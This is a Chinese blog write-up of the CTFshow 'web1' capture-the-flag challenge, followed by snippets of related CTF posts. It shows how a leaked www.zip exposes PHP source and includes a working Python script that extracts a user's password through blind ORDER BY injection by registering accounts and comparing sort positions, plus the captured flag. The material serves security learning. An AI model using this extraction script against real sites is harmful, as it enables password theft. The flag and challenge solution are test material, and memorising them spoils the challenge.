CTFshow web1

最新推荐文章于 2024-06-03 23:03:56 发布
原创 最新推荐文章于 2024-06-03 23:03:56 发布 · 1.4k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络 #php

打开是一个登录界面

用御剑扫描一下网站目录,发现有一个www.zip可以被正常访问到

访问,www.zip被下载,里边是网站的源码

login.php(登录页)中能禁的基本都禁干净了,登录页面貌似没有注入的可能。

reg.php(注册页)也是如此,所以注册页面也没可能了。

剩下最后一个user_main.php就是显示信息的页面了。这里可以看到在数据库中是把所有的字段都给查出来。

<?php
    
    if(isset($_SESSION["login"]) && $_SESSION["login"] === true){
        $con = mysqli_connect("localhost","root","root","web15");
        if (!$con)
        {
            die('Could not connect: ' . mysqli_error());
        }
        $order=$_GET['order'];
        if(isset($order) && strlen($order)<6){
            if(preg_match("/group|union|select|from|or|and|regexp|substr|like|create|drop|\,|\`|\~|\!|\@|\#|\%|\^|\&|\*|\(|\)|\(|\)|\-|\_|\+|\=|\{|\}|\[|\]|\;|\:|\'|\’|\“|\"|\<|\>|\?|\,|\.|\?/i",$order)){
                die("error");
            }
            $sql="select * from user order by $order";
        }else{
            $sql="select * from user order by id";
        }   

?>

查出来后显示,但是没有显示密码。

可以利用?order=pwd来判断注册的密码与flag用户密码的大小(即 select * from user order by pwd;),当我们按照pwd排序时,比如 flag用户的密码为flag{123},我们从小到大 一直到f都在他的上面,当我们注册的密码为g时,则出现第一个在下面的,这时我们就可以判断密码的第一个字符为f,手工的话会比较麻烦,所以需要用到大神的python脚本去跑,大神最后使用的方法是index,因为我用的时候总是报错ValueError: substring not found,所以把方法改成了find

import requests
url="http://597ea336-a259-48ce-9337-3f1b9cdb8ada.challenge.ctf.show"
url1=url+"/reg.php" #注册页面
url2=url+"/login.php"#登录界面
url3=url+"/user_main.php?order=pwd" #查询界面
k=""
s="-.0123456789:abcdefghijklmnopqrstuvwxyz{|}~"
for j in range(0,45):
    print("*")
    for i in s:
        #print(i)
        l=""
        l=k+i
        l2 = k+chr(ord(i)-1)
        data={'username':l,
                    'email':'c',
                    'nickname':'c',
                    'password':l
        }
        data2={'username':l,
                      'password':l
        }
        if (l=='flag'):
            k='flag'
            print(k)
            break
        session = requests.session()
        r1 = session.post(url1,data)
        r2 = session.post(url2,data)
        r3 = session.get(url3)
        t = r3.text
        #print(l)
        if (t.find("<td>"+l+"</td>")>t.find("<td>flag@ctf.show</td>")):
            k=l2
            print(k)
            break

跑一下脚本,不知道为啥最后一位跑成了|,给他改成},成功获得flag

成功获取到flag:

ctfshow{829726ad-ae4a-443c-b8c8-0857d98c6e21}

LZ_KaiHuang
关注
ctfshowweb】——信息搜集篇1web1~20详解)
练习时长两年半的CTF爱好者
02-22 3961
此题为 【从0开始学web】系列第二十题 此系列题目从最基础开始,题目遵循循序渐进的原则 希望对学习CTF WEB的同学有所帮助。
ctfshow_web入门_信息收集(web1-web20)
2302_79586141的博客
11-08 2086
直接Ctrl+U查看源码即可。
CTFshow php特性 web150
Kradress的博客
12-19 657
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-19 07:12:57 */ include("flag.php"); error_reporting(0); highlight_file(__FILE__); class CTFSHOW{
CTFshow web入门 web1
weixin_45990644的博客
07-06 335
CTFshow web入门 web1 这道题目比较简单,题目中有提到 “开发注释未及时删除” 点击连接后页面如下:按F12加入开发者模式查找注释(题目有提到),即可得到flag: 补充: 1.做题多看题目。 2.按F12是进加入开发者界面,主要功能简单来说可以帮助开发者调试js和根据页面元素快速定位,确认请求相应时间和相应内容等,根据内容进行程序调优用。 参考来源: https://www.bilibili.com/video/BV14y4y1J7Yb https://zhidao.baidu.com/qu
最新CTFShow web1-7——CTF秀WEB模块解题思路_ctfshow web题目解析
2401_84264727的博客
05-04 1456
这一关的重点在于注释, 由于开发人员的疏忽, 忘记删除注释中的敏感数据, 右键检查网页源码即可拿到 flag。
ctfshow web1-14 萌新赛wp
weixin_56546651的博客
06-03 763
经过MySQL编码后会变成’or’6xxx,使SQL恒成立,相当于万能密码,可以绕过md5()函数的加密。经过测试发现题目过滤了空格,使用/**/绕过空格,其余与WEB 2解法相同。经过测试,发现过滤很多,学习借鉴别的师傅写出的python脚本试试。尝试常见的弱口令admin/admin/admin123等无反应。手工尝试SQL注入未果,抓包保存为txt丢给sqlmap同样未果。经过测试,同样仅过滤了空格,同WEB 2。进行目录爆破,发现robots.txt。在多次尝试未果后翻看了别的师傅的wp,
CTFShow web1-7——CTF秀WEB模块解题思路
热门推荐
wangyuxiang946的博客
09-15 1万+
CTFShow WEB模块详细通关教程, 受篇幅所限, 通关教程分为上下两部分, 第一部分为1-7关, 第二部分为8-14关, 本篇博客为1-7关的通关教程, 从解题思路和所用到的知识点两个方面进行讲解 CTFShow web1-7关详细教程解题思路CTFShow web签到题CTFShow web2CTFShow web3CTFShow web4CTFShow web5CTFShow web6CTFShow web7知识点php://input伪协议日志注入MD5加密漏洞-0e绕过过滤空格的绕过方式 .
ctfshow web1
01-01
### CTFShow Web1挑战信息与解决方案 #### 挑战概述 CTFShow是一个在线网络安全竞赛平台,在Web1挑战中,参与者通常会遇到基础级别的网页安全漏洞利用问题。这类题目旨在帮助新手理解常见的Web攻击向量并学习如何...
ctfshow web 1
最新发布
01-09
对于 Web1Web7 的系列挑战,每道题目的设计都围绕着不同的安全漏洞展开: - **Web1**: 主要考察基本的 HTML 和 JavaScript 知识,通过简单的页面交互来理解前端的安全性[^1]。 - **Web2**: 引入了 URL 参数...
ctfshow web入门——web1
m0_74093152的博客
01-28 124
ctfshowweb入门——web1
ctfshowweb入门1
夜未至
03-21 621
在开发场景中,开发人员会忘记将开发时的注释删掉,导致一些意外的问题( 如:getshell),但是在真实场景中基本上是不可能发生的。不过作为初学者应该去了解这些问题。
CTFSHOWweb
zejiiii的博客
01-17 3023
1.f12打开开发者工具找到flag 2.禁止右键,用其他方法打开开发者工具找到flag 3.用burpsuite抓包找到flag 4.根据提示访问robots.phps后访问flagishere.txt 5.根据提示访问index.phps下载后得到flag 6.根据提示在网页后输入/www.zip得到压缩包解压后得到信息flag in fl000g.txt中 7.(版本控制联想到git泄露)根据提示git泄露,访问url/.git/inde..
CTFShow:萌新web1
weixin_64089259的博客
04-14 1384
第一次做web1题目,刚开始一脸懵逼,看了大佬的一些博客,才做出来,心里非常激动!
CTFshow——web入门——信息收集web1-web20 wp
Leaf_initial的博客
07-11 297
CTFshowweb入门中信息搜集全篇
ctfshow- web1(50 point)
HAI_WD的博客
08-29 1082
这里有一个坑哇,这里注册的时候密码会给你md5,数据库里存储的也是md5,所以需要我们手动修改为字符。通过url发现这里是通过order by进行了排序,测试发现一共5个字段,并且3是按照密码进行排序。那么思路就是,一个字符一个字符的去进行测试。尝试弱口令无果,可以注册,尝试注册一个账号。首先映入眼帘的是登录界面。
CTFSHOW web1-10
m0_57131590的博客
09-23 405
web1/web签到题: 没啥好说的,右键源代码出flag web2 猜闭合方式,加上万能密码得到回显: 接下来就是普通的union注入了。 web3 进入题目之后让我们以GET方式传参,但是传入url=flag.php发现并没有变化,此时考虑用伪协议。 抓包然后发送至repeater修改: 访问xxx/?url=ctf_go_go_go得到flag web4 乍一看和上一题一样,但是如果传入参数带有php的话会报错,这时我们可以进行日志注入(我也不知道怎么得到...
ctfshow-萌新-web1( 利用intval函数的特性获取敏感数据)
wangyuxiang946的博客
09-08 1万+
ctf.show 萌新模块的web1关, 这一关考察的是intval()函数转换字符串时的特性以及SQL的拼接绕过 这一关直接就给了源码, 并提示我们 id = 1000 时, 就是flag 先分析一下源码, 首先是 intval()函数将参数id转换为数值型, id > 999直接die()结束程序, 也就是说我们传递的id不能大于 999, 明知道1000就是flag, 但不能直接传1000, 否则程序会直接die()结束, 传递的id 即不能大于999, 又需要查询 1...
{CTFshow} 萌新web1 详解
lfc18950509270的博客
08-06 449
好家伙,直接明了,就是让我审计代码,看完发现,我们要用get方式提交,flag在id=1000,但是直接提交id=1000会返回错误,所以我们需要再添加一个id用来防止被拦截。没错,本来是这样的,但是我们查看id=2的内容的时候,发现为空,所以排序的时候id=2会排在后面,id=1000就变成了第一个(先看看id=1时它的内容,我们一定要仔细看它的sql语句,并且要掌握limit的用法:查完之后从小到大排序选前1个。这个时候就有问题了,从小到大的话,那前一个不是id=2的内容吗?讲一下我的理解,以供参考。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值